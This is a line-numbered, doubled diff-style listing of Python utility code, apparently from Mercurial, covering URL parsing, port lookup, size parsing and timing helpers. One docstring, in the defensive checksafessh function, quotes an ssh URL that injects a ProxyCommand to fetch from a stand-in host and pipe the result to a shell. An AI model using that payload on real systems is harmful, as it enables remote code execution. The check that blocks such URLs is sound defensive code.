2777 a regular expression.
2775 a regular expression.
2778
2776
2779 fn is an optional function that will be applied to the replacement text
2777 fn is an optional function that will be applied to the replacement text
2780 just before replacement.
2778 just before replacement.
2781
2779
2782 escape_prefix is an optional flag that allows using doubled prefix for
2780 escape_prefix is an optional flag that allows using doubled prefix for
2783 its escaping.
2781 its escaping.
2784 """
2782 """
2785 fn = fn or (lambda s: s)
2783 fn = fn or (lambda s: s)
2786 patterns = '|'.join(mapping.keys())
2784 patterns = '|'.join(mapping.keys())
2787 if escape_prefix:
2785 if escape_prefix:
2788 patterns += '|' + prefix
2786 patterns += '|' + prefix
2789 if len(prefix) > 1:
2787 if len(prefix) > 1:
2790 prefix_char = prefix[1:]
2788 prefix_char = prefix[1:]
2791 else:
2789 else:
2792 prefix_char = prefix
2790 prefix_char = prefix
2793 mapping[prefix_char] = prefix_char
2791 mapping[prefix_char] = prefix_char
2794 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2792 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2795 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2793 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2796
2794
2797 def getport(port):
2795 def getport(port):
2798 """Return the port for a given network service.
2796 """Return the port for a given network service.
2799
2797
2800 If port is an integer, it's returned as is. If it's a string, it's
2798 If port is an integer, it's returned as is. If it's a string, it's
2801 looked up using socket.getservbyname(). If there's no matching
2799 looked up using socket.getservbyname(). If there's no matching
2802 service, error.Abort is raised.
2800 service, error.Abort is raised.
2803 """
2801 """
2804 try:
2802 try:
2805 return int(port)
2803 return int(port)
2806 except ValueError:
2804 except ValueError:
2807 pass
2805 pass
2808
2806
2809 try:
2807 try:
2810 return socket.getservbyname(pycompat.sysstr(port))
2808 return socket.getservbyname(pycompat.sysstr(port))
2811 except socket.error:
2809 except socket.error:
2812 raise error.Abort(_("no port number associated with service '%s'")
2810 raise error.Abort(_("no port number associated with service '%s'")
2813 % port)
2811 % port)
2814
2812
2815 class url(object):
2813 class url(object):
2816 r"""Reliable URL parser.
2814 r"""Reliable URL parser.
2817
2815
2818 This parses URLs and provides attributes for the following
2816 This parses URLs and provides attributes for the following
2819 components:
2817 components:
2820
2818
2821 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2819 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2822
2820
2823 Missing components are set to None. The only exception is
2821 Missing components are set to None. The only exception is
2824 fragment, which is set to '' if present but empty.
2822 fragment, which is set to '' if present but empty.
2825
2823
2826 If parsefragment is False, fragment is included in query. If
2824 If parsefragment is False, fragment is included in query. If
2827 parsequery is False, query is included in path. If both are
2825 parsequery is False, query is included in path. If both are
2828 False, both fragment and query are included in path.
2826 False, both fragment and query are included in path.
2829
2827
2830 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2828 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2831
2829
2832 Note that for backward compatibility reasons, bundle URLs do not
2830 Note that for backward compatibility reasons, bundle URLs do not
2833 take host names. That means 'bundle://../' has a path of '../'.
2831 take host names. That means 'bundle://../' has a path of '../'.
2834
2832
2835 Examples:
2833 Examples:
2836
2834
2837 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2835 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2838 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2836 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2839 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2837 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2840 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2838 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2841 >>> url(b'file:///home/joe/repo')
2839 >>> url(b'file:///home/joe/repo')
2842 <url scheme: 'file', path: '/home/joe/repo'>
2840 <url scheme: 'file', path: '/home/joe/repo'>
2843 >>> url(b'file:///c:/temp/foo/')
2841 >>> url(b'file:///c:/temp/foo/')
2844 <url scheme: 'file', path: 'c:/temp/foo/'>
2842 <url scheme: 'file', path: 'c:/temp/foo/'>
2845 >>> url(b'bundle:foo')
2843 >>> url(b'bundle:foo')
2846 <url scheme: 'bundle', path: 'foo'>
2844 <url scheme: 'bundle', path: 'foo'>
2847 >>> url(b'bundle://../foo')
2845 >>> url(b'bundle://../foo')
2848 <url scheme: 'bundle', path: '../foo'>
2846 <url scheme: 'bundle', path: '../foo'>
2849 >>> url(br'c:\foo\bar')
2847 >>> url(br'c:\foo\bar')
2850 <url path: 'c:\\foo\\bar'>
2848 <url path: 'c:\\foo\\bar'>
2851 >>> url(br'\\blah\blah\blah')
2849 >>> url(br'\\blah\blah\blah')
2852 <url path: '\\\\blah\\blah\\blah'>
2850 <url path: '\\\\blah\\blah\\blah'>
2853 >>> url(br'\\blah\blah\blah#baz')
2851 >>> url(br'\\blah\blah\blah#baz')
2854 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2852 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2855 >>> url(br'file:///C:\users\me')
2853 >>> url(br'file:///C:\users\me')
2856 <url scheme: 'file', path: 'C:\\users\\me'>
2854 <url scheme: 'file', path: 'C:\\users\\me'>
2857
2855
2858 Authentication credentials:
2856 Authentication credentials:
2859
2857
2860 >>> url(b'ssh://joe:xyz@x/repo')
2858 >>> url(b'ssh://joe:xyz@x/repo')
2861 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2859 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2862 >>> url(b'ssh://joe@x/repo')
2860 >>> url(b'ssh://joe@x/repo')
2863 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2861 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2864
2862
2865 Query strings and fragments:
2863 Query strings and fragments:
2866
2864
2867 >>> url(b'http://host/a?b#c')
2865 >>> url(b'http://host/a?b#c')
2868 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2866 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2869 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2867 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2870 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2868 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2871
2869
2872 Empty path:
2870 Empty path:
2873
2871
2874 >>> url(b'')
2872 >>> url(b'')
2875 <url path: ''>
2873 <url path: ''>
2876 >>> url(b'#a')
2874 >>> url(b'#a')
2877 <url path: '', fragment: 'a'>
2875 <url path: '', fragment: 'a'>
2878 >>> url(b'http://host/')
2876 >>> url(b'http://host/')
2879 <url scheme: 'http', host: 'host', path: ''>
2877 <url scheme: 'http', host: 'host', path: ''>
2880 >>> url(b'http://host/#a')
2878 >>> url(b'http://host/#a')
2881 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2879 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2882
2880
2883 Only scheme:
2881 Only scheme:
2884
2882
2885 >>> url(b'http:')
2883 >>> url(b'http:')
2886 <url scheme: 'http'>
2884 <url scheme: 'http'>
2887 """
2885 """
2888
2886
2889 _safechars = "!~*'()+"
2887 _safechars = "!~*'()+"
2890 _safepchars = "/!~*'()+:\\"
2888 _safepchars = "/!~*'()+:\\"
2891 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2889 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2892
2890
2893 def __init__(self, path, parsequery=True, parsefragment=True):
2891 def __init__(self, path, parsequery=True, parsefragment=True):
2894 # We slowly chomp away at path until we have only the path left
2892 # We slowly chomp away at path until we have only the path left
2895 self.scheme = self.user = self.passwd = self.host = None
2893 self.scheme = self.user = self.passwd = self.host = None
2896 self.port = self.path = self.query = self.fragment = None
2894 self.port = self.path = self.query = self.fragment = None
2897 self._localpath = True
2895 self._localpath = True
2898 self._hostport = ''
2896 self._hostport = ''
2899 self._origpath = path
2897 self._origpath = path
2900
2898
2901 if parsefragment and '#' in path:
2899 if parsefragment and '#' in path:
2902 path, self.fragment = path.split('#', 1)
2900 path, self.fragment = path.split('#', 1)
2903
2901
2904 # special case for Windows drive letters and UNC paths
2902 # special case for Windows drive letters and UNC paths
2905 if hasdriveletter(path) or path.startswith('\\\\'):
2903 if hasdriveletter(path) or path.startswith('\\\\'):
2906 self.path = path
2904 self.path = path
2907 return
2905 return
2908
2906
2909 # For compatibility reasons, we can't handle bundle paths as
2907 # For compatibility reasons, we can't handle bundle paths as
2910 # normal URLS
2908 # normal URLS
2911 if path.startswith('bundle:'):
2909 if path.startswith('bundle:'):
2912 self.scheme = 'bundle'
2910 self.scheme = 'bundle'
2913 path = path[7:]
2911 path = path[7:]
2914 if path.startswith('//'):
2912 if path.startswith('//'):
2915 path = path[2:]
2913 path = path[2:]
2916 self.path = path
2914 self.path = path
2917 return
2915 return
2918
2916
2919 if self._matchscheme(path):
2917 if self._matchscheme(path):
2920 parts = path.split(':', 1)
2918 parts = path.split(':', 1)
2921 if parts[0]:
2919 if parts[0]:
2922 self.scheme, path = parts
2920 self.scheme, path = parts
2923 self._localpath = False
2921 self._localpath = False
2924
2922
2925 if not path:
2923 if not path:
2926 path = None
2924 path = None
2927 if self._localpath:
2925 if self._localpath:
2928 self.path = ''
2926 self.path = ''
2929 return
2927 return
2930 else:
2928 else:
2931 if self._localpath:
2929 if self._localpath:
2932 self.path = path
2930 self.path = path
2933 return
2931 return
2934
2932
2935 if parsequery and '?' in path:
2933 if parsequery and '?' in path:
2936 path, self.query = path.split('?', 1)
2934 path, self.query = path.split('?', 1)
2937 if not path:
2935 if not path:
2938 path = None
2936 path = None
2939 if not self.query:
2937 if not self.query:
2940 self.query = None
2938 self.query = None
2941
2939
2942 # // is required to specify a host/authority
2940 # // is required to specify a host/authority
2943 if path and path.startswith('//'):
2941 if path and path.startswith('//'):
2944 parts = path[2:].split('/', 1)
2942 parts = path[2:].split('/', 1)
2945 if len(parts) > 1:
2943 if len(parts) > 1:
2946 self.host, path = parts
2944 self.host, path = parts
2947 else:
2945 else:
2948 self.host = parts[0]
2946 self.host = parts[0]
2949 path = None
2947 path = None
2950 if not self.host:
2948 if not self.host:
2951 self.host = None
2949 self.host = None
2952 # path of file:///d is /d
2950 # path of file:///d is /d
2953 # path of file:///d:/ is d:/, not /d:/
2951 # path of file:///d:/ is d:/, not /d:/
2954 if path and not hasdriveletter(path):
2952 if path and not hasdriveletter(path):
2955 path = '/' + path
2953 path = '/' + path
2956
2954
2957 if self.host and '@' in self.host:
2955 if self.host and '@' in self.host:
2958 self.user, self.host = self.host.rsplit('@', 1)
2956 self.user, self.host = self.host.rsplit('@', 1)
2959 if ':' in self.user:
2957 if ':' in self.user:
2960 self.user, self.passwd = self.user.split(':', 1)
2958 self.user, self.passwd = self.user.split(':', 1)
2961 if not self.host:
2959 if not self.host:
2962 self.host = None
2960 self.host = None
2963
2961
2964 # Don't split on colons in IPv6 addresses without ports
2962 # Don't split on colons in IPv6 addresses without ports
2965 if (self.host and ':' in self.host and
2963 if (self.host and ':' in self.host and
2966 not (self.host.startswith('[') and self.host.endswith(']'))):
2964 not (self.host.startswith('[') and self.host.endswith(']'))):
2967 self._hostport = self.host
2965 self._hostport = self.host
2968 self.host, self.port = self.host.rsplit(':', 1)
2966 self.host, self.port = self.host.rsplit(':', 1)
2969 if not self.host:
2967 if not self.host:
2970 self.host = None
2968 self.host = None
2971
2969
2972 if (self.host and self.scheme == 'file' and
2970 if (self.host and self.scheme == 'file' and
2973 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2971 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2974 raise error.Abort(_('file:// URLs can only refer to localhost'))
2972 raise error.Abort(_('file:// URLs can only refer to localhost'))
2975
2973
2976 self.path = path
2974 self.path = path
2977
2975
2978 # leave the query string escaped
2976 # leave the query string escaped
2979 for a in ('user', 'passwd', 'host', 'port',
2977 for a in ('user', 'passwd', 'host', 'port',
2980 'path', 'fragment'):
2978 'path', 'fragment'):
2981 v = getattr(self, a)
2979 v = getattr(self, a)
2982 if v is not None:
2980 if v is not None:
2983 setattr(self, a, urlreq.unquote(v))
2981 setattr(self, a, urlreq.unquote(v))
2984
2982
2985 @encoding.strmethod
2983 @encoding.strmethod
2986 def __repr__(self):
2984 def __repr__(self):
2987 attrs = []
2985 attrs = []
2988 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2986 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2989 'query', 'fragment'):
2987 'query', 'fragment'):
2990 v = getattr(self, a)
2988 v = getattr(self, a)
2991 if v is not None:
2989 if v is not None:
2992 attrs.append('%s: %r' % (a, v))
2990 attrs.append('%s: %r' % (a, v))
2993 return '<url %s>' % ', '.join(attrs)
2991 return '<url %s>' % ', '.join(attrs)
2994
2992
2995 def __bytes__(self):
2993 def __bytes__(self):
2996 r"""Join the URL's components back into a URL string.
2994 r"""Join the URL's components back into a URL string.
2997
2995
2998 Examples:
2996 Examples:
2999
2997
3000 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2998 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3001 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2999 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3002 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3000 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3003 'http://user:pw@host:80/?foo=bar&baz=42'
3001 'http://user:pw@host:80/?foo=bar&baz=42'
3004 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3002 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3005 'http://user:pw@host:80/?foo=bar%3dbaz'
3003 'http://user:pw@host:80/?foo=bar%3dbaz'
3006 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3004 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3007 'ssh://user:pw@[::1]:2200//home/joe#'
3005 'ssh://user:pw@[::1]:2200//home/joe#'
3008 >>> bytes(url(b'http://localhost:80//'))
3006 >>> bytes(url(b'http://localhost:80//'))
3009 'http://localhost:80//'
3007 'http://localhost:80//'
3010 >>> bytes(url(b'http://localhost:80/'))
3008 >>> bytes(url(b'http://localhost:80/'))
3011 'http://localhost:80/'
3009 'http://localhost:80/'
3012 >>> bytes(url(b'http://localhost:80'))
3010 >>> bytes(url(b'http://localhost:80'))
3013 'http://localhost:80/'
3011 'http://localhost:80/'
3014 >>> bytes(url(b'bundle:foo'))
3012 >>> bytes(url(b'bundle:foo'))
3015 'bundle:foo'
3013 'bundle:foo'
3016 >>> bytes(url(b'bundle://../foo'))
3014 >>> bytes(url(b'bundle://../foo'))
3017 'bundle:../foo'
3015 'bundle:../foo'
3018 >>> bytes(url(b'path'))
3016 >>> bytes(url(b'path'))
3019 'path'
3017 'path'
3020 >>> bytes(url(b'file:///tmp/foo/bar'))
3018 >>> bytes(url(b'file:///tmp/foo/bar'))
3021 'file:///tmp/foo/bar'
3019 'file:///tmp/foo/bar'
3022 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3020 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3023 'file:///c:/tmp/foo/bar'
3021 'file:///c:/tmp/foo/bar'
3024 >>> print(url(br'bundle:foo\bar'))
3022 >>> print(url(br'bundle:foo\bar'))
3025 bundle:foo\bar
3023 bundle:foo\bar
3026 >>> print(url(br'file:///D:\data\hg'))
3024 >>> print(url(br'file:///D:\data\hg'))
3027 file:///D:\data\hg
3025 file:///D:\data\hg
3028 """
3026 """
3029 if self._localpath:
3027 if self._localpath:
3030 s = self.path
3028 s = self.path
3031 if self.scheme == 'bundle':
3029 if self.scheme == 'bundle':
3032 s = 'bundle:' + s
3030 s = 'bundle:' + s
3033 if self.fragment:
3031 if self.fragment:
3034 s += '#' + self.fragment
3032 s += '#' + self.fragment
3035 return s
3033 return s
3036
3034
3037 s = self.scheme + ':'
3035 s = self.scheme + ':'
3038 if self.user or self.passwd or self.host:
3036 if self.user or self.passwd or self.host:
3039 s += '//'
3037 s += '//'
3040 elif self.scheme and (not self.path or self.path.startswith('/')
3038 elif self.scheme and (not self.path or self.path.startswith('/')
3041 or hasdriveletter(self.path)):
3039 or hasdriveletter(self.path)):
3042 s += '//'
3040 s += '//'
3043 if hasdriveletter(self.path):
3041 if hasdriveletter(self.path):
3044 s += '/'
3042 s += '/'
3045 if self.user:
3043 if self.user:
3046 s += urlreq.quote(self.user, safe=self._safechars)
3044 s += urlreq.quote(self.user, safe=self._safechars)
3047 if self.passwd:
3045 if self.passwd:
3048 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3046 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3049 if self.user or self.passwd:
3047 if self.user or self.passwd:
3050 s += '@'
3048 s += '@'
3051 if self.host:
3049 if self.host:
3052 if not (self.host.startswith('[') and self.host.endswith(']')):
3050 if not (self.host.startswith('[') and self.host.endswith(']')):
3053 s += urlreq.quote(self.host)
3051 s += urlreq.quote(self.host)
3054 else:
3052 else:
3055 s += self.host
3053 s += self.host
3056 if self.port:
3054 if self.port:
3057 s += ':' + urlreq.quote(self.port)
3055 s += ':' + urlreq.quote(self.port)
3058 if self.host:
3056 if self.host:
3059 s += '/'
3057 s += '/'
3060 if self.path:
3058 if self.path:
3061 # TODO: similar to the query string, we should not unescape the
3059 # TODO: similar to the query string, we should not unescape the
3062 # path when we store it, the path might contain '%2f' = '/',
3060 # path when we store it, the path might contain '%2f' = '/',
3063 # which we should *not* escape.
3061 # which we should *not* escape.
3064 s += urlreq.quote(self.path, safe=self._safepchars)
3062 s += urlreq.quote(self.path, safe=self._safepchars)
3065 if self.query:
3063 if self.query:
3066 # we store the query in escaped form.
3064 # we store the query in escaped form.
3067 s += '?' + self.query
3065 s += '?' + self.query
3068 if self.fragment is not None:
3066 if self.fragment is not None:
3069 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3067 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3070 return s
3068 return s
3071
3069
3072 __str__ = encoding.strmethod(__bytes__)
3070 __str__ = encoding.strmethod(__bytes__)
3073
3071
3074 def authinfo(self):
3072 def authinfo(self):
3075 user, passwd = self.user, self.passwd
3073 user, passwd = self.user, self.passwd
3076 try:
3074 try:
3077 self.user, self.passwd = None, None
3075 self.user, self.passwd = None, None
3078 s = bytes(self)
3076 s = bytes(self)
3079 finally:
3077 finally:
3080 self.user, self.passwd = user, passwd
3078 self.user, self.passwd = user, passwd
3081 if not self.user:
3079 if not self.user:
3082 return (s, None)
3080 return (s, None)
3083 # authinfo[1] is passed to urllib2 password manager, and its
3081 # authinfo[1] is passed to urllib2 password manager, and its
3084 # URIs must not contain credentials. The host is passed in the
3082 # URIs must not contain credentials. The host is passed in the
3085 # URIs list because Python < 2.4.3 uses only that to search for
3083 # URIs list because Python < 2.4.3 uses only that to search for
3086 # a password.
3084 # a password.
3087 return (s, (None, (s, self.host),
3085 return (s, (None, (s, self.host),
3088 self.user, self.passwd or ''))
3086 self.user, self.passwd or ''))
3089
3087
3090 def isabs(self):
3088 def isabs(self):
3091 if self.scheme and self.scheme != 'file':
3089 if self.scheme and self.scheme != 'file':
3092 return True # remote URL
3090 return True # remote URL
3093 if hasdriveletter(self.path):
3091 if hasdriveletter(self.path):
3094 return True # absolute for our purposes - can't be joined()
3092 return True # absolute for our purposes - can't be joined()
3095 if self.path.startswith(br'\\'):
3093 if self.path.startswith(br'\\'):
3096 return True # Windows UNC path
3094 return True # Windows UNC path
3097 if self.path.startswith('/'):
3095 if self.path.startswith('/'):
3098 return True # POSIX-style
3096 return True # POSIX-style
3099 return False
3097 return False
3100
3098
3101 def localpath(self):
3099 def localpath(self):
3102 if self.scheme == 'file' or self.scheme == 'bundle':
3100 if self.scheme == 'file' or self.scheme == 'bundle':
3103 path = self.path or '/'
3101 path = self.path or '/'
3104 # For Windows, we need to promote hosts containing drive
3102 # For Windows, we need to promote hosts containing drive
3105 # letters to paths with drive letters.
3103 # letters to paths with drive letters.
3106 if hasdriveletter(self._hostport):
3104 if hasdriveletter(self._hostport):
3107 path = self._hostport + '/' + self.path
3105 path = self._hostport + '/' + self.path
3108 elif (self.host is not None and self.path
3106 elif (self.host is not None and self.path
3109 and not hasdriveletter(path)):
3107 and not hasdriveletter(path)):
3110 path = '/' + path
3108 path = '/' + path
3111 return path
3109 return path
3112 return self._origpath
3110 return self._origpath
3113
3111
3114 def islocal(self):
3112 def islocal(self):
3115 '''whether localpath will return something that posixfile can open'''
3113 '''whether localpath will return something that posixfile can open'''
3116 return (not self.scheme or self.scheme == 'file'
3114 return (not self.scheme or self.scheme == 'file'
3117 or self.scheme == 'bundle')
3115 or self.scheme == 'bundle')
3118
3116
3119 def hasscheme(path):
3117 def hasscheme(path):
3120 return bool(url(path).scheme)
3118 return bool(url(path).scheme)
3121
3119
3122 def hasdriveletter(path):
3120 def hasdriveletter(path):
3123 return path and path[1:2] == ':' and path[0:1].isalpha()
3121 return path and path[1:2] == ':' and path[0:1].isalpha()
3124
3122
3125 def urllocalpath(path):
3123 def urllocalpath(path):
3126 return url(path, parsequery=False, parsefragment=False).localpath()
3124 return url(path, parsequery=False, parsefragment=False).localpath()
3127
3125
3128 def checksafessh(path):
3126 def checksafessh(path):
3129 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3127 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3130
3128
3131 This is a sanity check for ssh urls. ssh will parse the first item as
3129 This is a sanity check for ssh urls. ssh will parse the first item as
3132 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3130 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3133 Let's prevent these potentially exploited urls entirely and warn the
3131 Let's prevent these potentially exploited urls entirely and warn the
3134 user.
3132 user.
3135
3133
3136 Raises an error.Abort when the url is unsafe.
3134 Raises an error.Abort when the url is unsafe.
3137 """
3135 """
3138 path = urlreq.unquote(path)
3136 path = urlreq.unquote(path)
3139 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3137 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3140 raise error.Abort(_('potentially unsafe url: %r') %
3138 raise error.Abort(_('potentially unsafe url: %r') %
3141 (pycompat.bytestr(path),))
3139 (pycompat.bytestr(path),))
3142
3140
3143 def hidepassword(u):
3141 def hidepassword(u):
3144 '''hide user credential in a url string'''
3142 '''hide user credential in a url string'''
3145 u = url(u)
3143 u = url(u)
3146 if u.passwd:
3144 if u.passwd:
3147 u.passwd = '***'
3145 u.passwd = '***'
3148 return bytes(u)
3146 return bytes(u)
3149
3147
3150 def removeauth(u):
3148 def removeauth(u):
3151 '''remove all authentication information from a url string'''
3149 '''remove all authentication information from a url string'''
3152 u = url(u)
3150 u = url(u)
3153 u.user = u.passwd = None
3151 u.user = u.passwd = None
3154 return str(u)
3152 return str(u)
3155
3153
3156 timecount = unitcountfn(
3154 timecount = unitcountfn(
3157 (1, 1e3, _('%.0f s')),
3155 (1, 1e3, _('%.0f s')),
3158 (100, 1, _('%.1f s')),
3156 (100, 1, _('%.1f s')),
3159 (10, 1, _('%.2f s')),
3157 (10, 1, _('%.2f s')),
3160 (1, 1, _('%.3f s')),
3158 (1, 1, _('%.3f s')),
3161 (100, 0.001, _('%.1f ms')),
3159 (100, 0.001, _('%.1f ms')),
3162 (10, 0.001, _('%.2f ms')),
3160 (10, 0.001, _('%.2f ms')),
3163 (1, 0.001, _('%.3f ms')),
3161 (1, 0.001, _('%.3f ms')),
3164 (100, 0.000001, _('%.1f us')),
3162 (100, 0.000001, _('%.1f us')),
3165 (10, 0.000001, _('%.2f us')),
3163 (10, 0.000001, _('%.2f us')),
3166 (1, 0.000001, _('%.3f us')),
3164 (1, 0.000001, _('%.3f us')),
3167 (100, 0.000000001, _('%.1f ns')),
3165 (100, 0.000000001, _('%.1f ns')),
3168 (10, 0.000000001, _('%.2f ns')),
3166 (10, 0.000000001, _('%.2f ns')),
3169 (1, 0.000000001, _('%.3f ns')),
3167 (1, 0.000000001, _('%.3f ns')),
3170 )
3168 )
3171
3169
3172 _timenesting = [0]
3170 _timenesting = [0]
3173
3171
3174 def timed(func):
3172 def timed(func):
3175 '''Report the execution time of a function call to stderr.
3173 '''Report the execution time of a function call to stderr.
3176
3174
3177 During development, use as a decorator when you need to measure
3175 During development, use as a decorator when you need to measure
3178 the cost of a function, e.g. as follows:
3176 the cost of a function, e.g. as follows:
3179
3177
3180 @util.timed
3178 @util.timed
3181 def foo(a, b, c):
3179 def foo(a, b, c):
3182 pass
3180 pass
3183 '''
3181 '''
3184
3182
3185 def wrapper(*args, **kwargs):
3183 def wrapper(*args, **kwargs):
3186 start = timer()
3184 start = timer()
3187 indent = 2
3185 indent = 2
3188 _timenesting[0] += indent
3186 _timenesting[0] += indent
3189 try:
3187 try:
3190 return func(*args, **kwargs)
3188 return func(*args, **kwargs)
3191 finally:
3189 finally:
3192 elapsed = timer() - start
3190 elapsed = timer() - start
3193 _timenesting[0] -= indent
3191 _timenesting[0] -= indent
3194 stderr.write('%s%s: %s\n' %
3192 stderr.write('%s%s: %s\n' %
3195 (' ' * _timenesting[0], func.__name__,
3193 (' ' * _timenesting[0], func.__name__,
3196 timecount(elapsed)))
3194 timecount(elapsed)))
3197 return wrapper
3195 return wrapper
3198
3196
3199 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3197 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3200 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3198 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3201
3199
3202 def sizetoint(s):
3200 def sizetoint(s):
3203 '''Convert a space specifier to a byte count.
3201 '''Convert a space specifier to a byte count.
3204
3202
3205 >>> sizetoint(b'30')
3203 >>> sizetoint(b'30')
3206 30
3204 30
3207 >>> sizetoint(b'2.2kb')
3205 >>> sizetoint(b'2.2kb')
3208 2252
3206 2252
3209 >>> sizetoint(b'6M')
3207 >>> sizetoint(b'6M')
3210 6291456
3208 6291456
3211 '''
3209 '''
3212 t = s.strip().lower()
3210 t = s.strip().lower()
3213 try:
3211 try:
3214 for k, u in _sizeunits:
3212 for k, u in _sizeunits:
3215 if t.endswith(k):
3213 if t.endswith(k):
3216 return int(float(t[:-len(k)]) * u)
3214 return int(float(t[:-len(k)]) * u)
3217 return int(t)
3215 return int(t)
3218 except ValueError:
3216 except ValueError:
3219 raise error.ParseError(_("couldn't parse size: %s") % s)
3217 raise error.ParseError(_("couldn't parse size: %s") % s)
3220
3218
3221 class hooks(object):
3219 class hooks(object):
3222 '''A collection of hook functions that can be used to extend a
3220 '''A collection of hook functions that can be used to extend a
3223 function's behavior. Hooks are called in lexicographic order,
3221 function's behavior. Hooks are called in lexicographic order,
3224 based on the names of their sources.'''
3222 based on the names of their sources.'''
3225
3223
3226 def __init__(self):
3224 def __init__(self):
3227 self._hooks = []
3225 self._hooks = []
3228
3226
3229 def add(self, source, hook):
3227 def add(self, source, hook):
3230 self._hooks.append((source, hook))
3228 self._hooks.append((source, hook))
3231
3229
3232 def __call__(self, *args):
3230 def __call__(self, *args):
3233 self._hooks.sort(key=lambda x: x[0])
3231 self._hooks.sort(key=lambda x: x[0])
3234 results = []
3232 results = []
3235 for source, hook in self._hooks:
3233 for source, hook in self._hooks:
3236 results.append(hook(*args))
3234 results.append(hook(*args))
3237 return results
3235 return results
3238
3236
3239 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3237 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3240 '''Yields lines for a nicely formatted stacktrace.
3238 '''Yields lines for a nicely formatted stacktrace.
3241 Skips the 'skip' last entries, then return the last 'depth' entries.
3239 Skips the 'skip' last entries, then return the last 'depth' entries.
3242 Each file+linenumber is formatted according to fileline.
3240 Each file+linenumber is formatted according to fileline.
3243 Each line is formatted according to line.
3241 Each line is formatted according to line.
3244 If line is None, it yields:
3242 If line is None, it yields:
3245 length of longest filepath+line number,
3243 length of longest filepath+line number,
3246 filepath+linenumber,
3244 filepath+linenumber,
3247 function
3245 function
3248
3246
3249 Not be used in production code but very convenient while developing.
3247 Not be used in production code but very convenient while developing.
3250 '''
3248 '''
3251 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3249 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3252 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3250 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3253 ][-depth:]
3251 ][-depth:]
3254 if entries:
3252 if entries:
3255 fnmax = max(len(entry[0]) for entry in entries)
3253 fnmax = max(len(entry[0]) for entry in entries)
3256 for fnln, func in entries:
3254 for fnln, func in entries:
3257 if line is None:
3255 if line is None:
3258 yield (fnmax, fnln, func)
3256 yield (fnmax, fnln, func)
3259 else:
3257 else:
3260 yield line % (fnmax, fnln, func)
3258 yield line % (fnmax, fnln, func)
3261
3259
3262 def debugstacktrace(msg='stacktrace', skip=0,
3260 def debugstacktrace(msg='stacktrace', skip=0,
3263 f=stderr, otherf=stdout, depth=0):
3261 f=stderr, otherf=stdout, depth=0):
